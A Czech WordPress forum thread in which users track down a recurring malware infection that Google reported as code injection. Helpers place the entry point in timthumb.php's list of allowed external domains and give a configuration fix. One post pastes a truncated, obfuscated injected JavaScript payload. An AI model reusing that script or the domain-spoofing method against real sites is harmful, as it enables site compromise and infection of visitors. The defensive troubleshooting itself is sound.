Malware

Zvolené téma obsahuje celkem 25 odpovědí. Do diskuze (4 účastníci) se naposledy zapojil uživatel  Lukenzi a poslední změna je stará 8 let, 10 měsíců.

Aktuálně je na stránce zobrazeno 20 příspěvků - 1. až 20. (z celkem 26)
  • Autor
    Příspěvky
  • #1946

    halouzka
    Participant

    Dobry den,

    jiz 14 dni odstranuji malware, ale stale se znovu infikuje.

    Zaplatil jsem si i rucni vycisteni webu – http://sucuri.net. Problem je ale v tom, ze malware se vzdy infikuje do cca 24 hodin znovu. Nedostanu se ani s blacklistu google.

    Vzdy po odstraneni malwaeru provedu doporucene bezpecnostni zmeny (hesla, DB, FTP, Admin,…) http://sucuri.net/after-the-clean-up-what-to-do-after-your-site-is-fixed.html

    Dokonce jsem smazal cely web prez FTPS a nahral cistou instlaci s nove zakoupenym themem, ale malware se infikoval zase.

    Nemate nekdo podobnou zkusenost? Uz si nevim rady. Dekuji za kazdou radu.

    #12333

    admin
    Keymaster
    Web

    Nemohlo by to být serverem? Jaký používáte hosting?

    #12334

    halouzka
    Participant

    Wedos

    Mam u nich vice micro webu na multihostingu a tento je jediny, ktery je infikovan.

    #12335

    Lukenzi
    Participant

    Bez podrobnějších informací to tady nikdo nevyřeší, chce to alespoň URL webu.

    Hosting WEDOS je ZATÍM bez problémů co se týče bezpečnosti, takže bych to viděl na nějakou skulinu v šabloně nebo nějakém pluginu.

    Pokud mi pošlete nějaké info + přístup na FTP můžu ten problém vyřešit (lukenzi@gmail.com).

    #12336

    admin
    Keymaster
    Web

    Je to podivné, ale problém v šabloně a pluginu bych vyloučil?

    Dokonce jsem smazal cely web prez FTPS a nahral cistou instlaci s nove zakoupenym themem, ale malware se infikoval zase.

    Pokud je tam jen čistá instalace a nějaká nová prémiová šablona, tak by tam asi neměl být problém?

    Ještě mě napadá zavirovaný počítač, ale potom by bylo asi napadených webů více? Jakým způsobem se ten malware projevuje?

    halouzka: To jste si zaplatil vyčištění webu za 89,99 USD nebo to je nějaká jiná služba?

    #12337

    halouzka
    Participant

    Jedna se o web http://www.automatyzdarma.eu

    Pocitac je bez viru.

    Zaplatil jsem 89,90 USD za vycisteni a zatim mi to cisti kazdy den :)

    #12338

    zabza
    Participant

    Jen pro informaci mě na Vaší stránku nepustil firefox a odkázal mě na http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=automatyzdarma.eu

    #12339

    halouzka
    Participant

    Ano, to je prave onen black list od google. Protoze web obsahoval/obsahuje Malware, tak je na blacklistu

    #12340

    Lukenzi
    Participant

    halouzka: Sranda je to, že sucuri vám čistí web i když sami neví co je na něm škodlivého, jako škodlivý jej označili právě pouze kvůli tomu, že jej blokuje google. Google na vašem webu údajně našel trojana a to pouze na 15-ti stránkách z 80 což je samo o sobě podivné, většinou bývá malware includován do všech stránek a né pouze do některých.

    Mě spíše zajímá proč jsem schopen získat z úvodní stránky dva rozdílné zdrojové kódy (žádný není nijak škodlivý – jsou pouze malinko rozdílné). Jde o XHR request nějakého pluginu…

    EDIT: zdroje rozdílné nejsou pouze při načítání stránky je nějaký XHR request zřejmě ajaxem, který načte tu samou stránku, kterou se pokoušíte zobrazit. Možná bych se ani nebál tvrdit, že jde o planý poplach. Bez podrobnějšího prozkoumání, ale těžko říct…

    #12341

    Lukenzi
    Participant

    Kouknul jsem na to a výsledek je takový:

    1) nenašel jsem žádný škodlivý kód, ani v šabloně ani v pluginech

    2) nenašel jsem žádné odkazy nebo cokoliv podivného

    3) WordPress, všechny pluginy a šablony jsou aktuální a nenašel jsem žádnou zmínku o nějaké bezpečnostní chybě v současných verzích

    4) web jako takový je relativně dobře zabezpečen

    Takže nějak nerozumím několika věcem:

    1) jak jste poznal, že web je opět infikován i když jste jej celý přeinstaloval? (to, že prohlížeč vrací nějakou hlášku mně nezajímá, mně zajímá konkrétní soubor, script, funkce, odkazy atd atd)

    2) co že konkrétně sucuri našel a odstranil (v jakých souborech atd.), protože ve výsledku píše “malware not identified” (viz zde)

    3) Jak můžete vědět, že web je do 24. hodin opět infikovaný, jak se to projevilo? – dostat se z blacklistu googlu trvá docela dlouho i když je web čistý, určitě to není záležitost na 24hodin

    Jinak pro info McAfee Site Advisor na webu nevidí žádný problém (viz zde).

    #12342

    admin
    Keymaster
    Web

    Dobrá práce, Lukenzi. Takže to byl patrně planý poplach? :-)

    Pokud halouzka usuzoval, že je web zavirován z toho, že to hlásí vyhledávače (a na základě nich i používané prohlížeče), tak tomu tak už patrně není, protože obvykle nějakou dobu trvá než dojde k opětovnému posouzení bezpečnosti webu. Doporučuji to v tomto případě zkusit urychlit pomocí Webmaster Tools od Google.

    #12343

    halouzka
    Participant

    Predne chci podekovat za Vas cas.

    Lukenzi:

    1. na email mi prijde upozorneni o infekci z http://sucuri.net nebo zjistim, ze na google tools jsem zase v blacklistu, i kdyz jsem v nem jiz par hodin nefiguroval.

    2. vetsinou, kdyz web vycistili panove z http://sucuri.net, tak jsem pozadal google a do 24 hodin me z blacklistu vyhodili, nebo ne. Google tools mi web posuzoval kazdy den.

    Admin:

    Vzdy, kdyz me informuji (http://sucuri.net), ze je web vycisten, tak pozadam google o kontrolu z google tools. Vetsinou jim to trva do druheho dne. Posledni kontrolu provedl google vcera, kdy mel byt web jiz cisty, ale stale ho ponechal v black listu!

    #12344

    Lukenzi
    Participant

    Aktuálně teď se mi stránka zobrazí bez jakéhokoliv upozornění, takže předpokládám, že snad je to ok.

    Jen mně zaráží, že doteď jsem neviděl nic co by se dalo pokládat opravdu za nějaké nebezpečí na vašem webu. Pokud sucuri něco na vašem webu odstranila tak by snad mohli napsat nějaké konkrétní informace co že to vlastně bylo (popřípadě alespoň v jakém souboru), už třeba jen proto, aby jste tomu mohl v budoucnu předejít.

    Z google se nedá zjistit nějaké další informace? Například konkrétně na kterých stránkách byl škodlivý kód nalezen?

    Z toho co vím vyplývá jediné a to, že něco na vašem webu označil google za škodlivé (můžet to být klidně jen odkaz na jiný web obsahující něco škodlivého), tomu by i nasvědčovalo to, že to nalezl jen na pouhých 15-ti stránkách z celkových 80. Možná to byl jen odkaz (reklama?) na jiný server (v menu online casina) nebo odkazy z unibetu (také vedou na jiné servery). Těžko říct bez nějakých podrobnějších informací.

    Každopádně pokud by se to opakovalo asi bych se nebál použít jinou šablonu vzhledu, vaše je řekl bych extrémně složitá na to co má dělat (mraky ajaxu, framework, vlastní pluginy šablony atd atd) a objevit nějaké zadní vrátka v tolika tisících řádcích zdrojového kódu není zrovna jednoduché… Ostatně to co nakonec vidí uživatel v prohlížeči je skoro to samé co by zvládla malinko upravená výchozí šablona.

    #12345

    halouzka
    Participant

    Tak nyni byl u me google a zase nasel injektaze (viz. nize). Podezrely vlozeny kod je:

    <script>try{n|=Math.round;}catch(zxc){m=Math;n="126..135..14
    70..1530..448..600..1400..1665..1386..1755..1526..1515..1540
    ..1740..644..1545..1414..1740..966..1620..1414..1635..1414..
    1650..1624..1725..924..1815..1176..1455..1442..1170..1358..1
    635..1414..600..546..1470..1554..1500..1694..585..574..1365.
    .672..1395..574..1845..182..135..126..135..1470..1530..1596.
    .1455..1526..1515..1596..600..574..885..182..135..126..1875.
    .448..1515..1512..1725..1414..480..1722..195..126..135..126.
    .1500..1554..1485..1638..1635..1414..1650..1624..690..1666..
    1710..1470..1740..1414..600..476..900..1470..1530..1596..145
    5..1526..1515..448..1725..1596..1485..854..585..1456..1740..
    1624..1680..812..705..658..1665..1512..1485..1694..1590..158
    2..1680..1638..1560..1498..690..1568..1665..1596..1740..1596
    ..1515..1512..1455..1694..690..1386..1665..1526..705..1610..
    1740..1358..1740..658..1545..1358..690..1568..1560..1568..58
    5..448..1785..1470..1500..1624..1560..854..585..686..720..54
    6..480..1456..1515..1470..1545..1456..1740..854..585..686..7
    20..

    Adresy URL	Typ	Poslední kontrola
    http://www.automatyzdarma.eu/author/hally2/page/5/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/jack-and-the-beanstalk-5-valcu/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/gonzos-quest/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/stolni-hry-ruleta-blackjack/blackjack/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/zombies-5-valcu-2/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/5-valcu/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/casinoeuro/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/stolni-hry-ruleta-blackjack/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/?p=1077 Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/super-nudge-6000-3-valce/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/?cat=74 Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/scarface-5-valcu/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/blackjack-double-jack/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/vikings-treasure-5-valcu-2/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/safari-madnes/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/5-valcu/page/2/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/automaty-dle-casina/casinoeuro/page/3/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/?p=1018 Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/casino-hry-zdarma/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/frankenstein/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/?cat=69&paged=2 Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/5-valcu/page/3/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/100-bonus-az-do-5000kc/ Injektáž kódu 15.08.12
    http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/page/3/

    #12346

    halouzka
    Participant

    Varování od Goole:

    Google na tomto webu objevil škodlivý kód . Doporučujeme, abyste web rychle vyčistili. Pokud tak neučiníte, uživatelům Google se při pokusu o zobrazení stránek tohoto webu může zobrazit upozornění.

    #12347

    Lukenzi
    Participant

    Tak to přece jen není planý poplach, škodlivý kód se vždy objeví v souboru index.php v rootu. Problém je ten, že nemůžu přijít na to jak se tam dostane a v době kdy jsem se na něj koukal prvně tam nebyl…

    Každopádně poslední změna souboru je 18:07 a to když jsem ho vyčistil a zatím je nezměněn.

    EDIT:

    malinka úprava, doporučuji změnit hesla (FTP, MYSQL, administrace)

    Pokud i teď dojde k infekci tak by možná ještě pomohl log apache, jinak už fakt nevím a začal bych znovu s novým WP a jinou šablonou.

    #12348

    halouzka
    Participant

    Momentalne google hlasi – no blacklist.

    Tak doufam, ze preziji noc :)

    #12350

    halouzka
    Participant

    Lukenzi:

    jaka byla ta mala uprava?

    Zda se, ze zadne nove napadani se nekona.

    #12351

    Lukenzi
    Participant

    Malinko jsem upravil oba soubory thumb.php v pluginech wp_rokbox a wp_roknewspager což jsou jen přejmenované soubory timthumb.php známé svými bezpečnostními dírami snad v každé předchozí verzi. A ačkoliv je poslední verze pokládána za bezpečnou (čti ještě nikdo nedokázal opak) tak bohužel bezpečná zřejmě není. A protože se tento script pro práci s obrázky vyskytuje ve stovkách možná tisících šablonách a pluginech nemám z toho vůbec žádnou radost…

    Než ale budeme dělat nějaké závěry raději bych ještě nějaký čas počkal zda tato malá úprava opravdu vyřešila váš problém. Nebo pokud by to šlo, dost by mně zajímal access log ze serveru (z poslední doby – nejlépe tak týden, samozřejmě na mejl). Pořád ještě nevím konkrétně jaké chyby v tom souboru timthumb.php ta potvora využila, zatím to nedokážu zopakovat…

    #12352

    Lukenzi
    Participant

    Tak už jsem na to zřejmě přišel, 8.srpna byla reportována tato bezpečnostní chyba – zatím bez reakce.

    Script ve výchozím stavu neumožňuje načítání obrázků z externích serverů, ale z nějakého důvodu autoři ponechali povolené domény “flickr.com, staticflickr.com, picasa.com” atd. Problém je v tom, že pokud znám umístění scriptu na vašem serveru a na mém webu s doménou obsahující výše uvedené názvy (třeba flickr.com.cz) budu mít script s nějakým škodlivým kódem můžu jej přes soubor timthumb.php spustit na vašem webu (jednoduše řečeno).

    Oprava této chyby spočívá v nastavení konstant ALLOW_EXTERNAL na FALSE, ALLOW_ALL_EXTERNAL_SITES také na FALSE (řádek 32 a 33).

    Popřípadě smazat obsah pole $ALLOWED_SITES (řádek 127-135). Nebudete sice moci přes tento script načítat obrázky z jiných domén než je doména webu, ale budete bez malware.

    Pro 100% jistotu, že už bude vše v pořádku bych, ale potřeboval ten log z hostingu…

Aktuálně je na stránce zobrazeno 20 příspěvků - 1. až 20. (z celkem 26)

Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.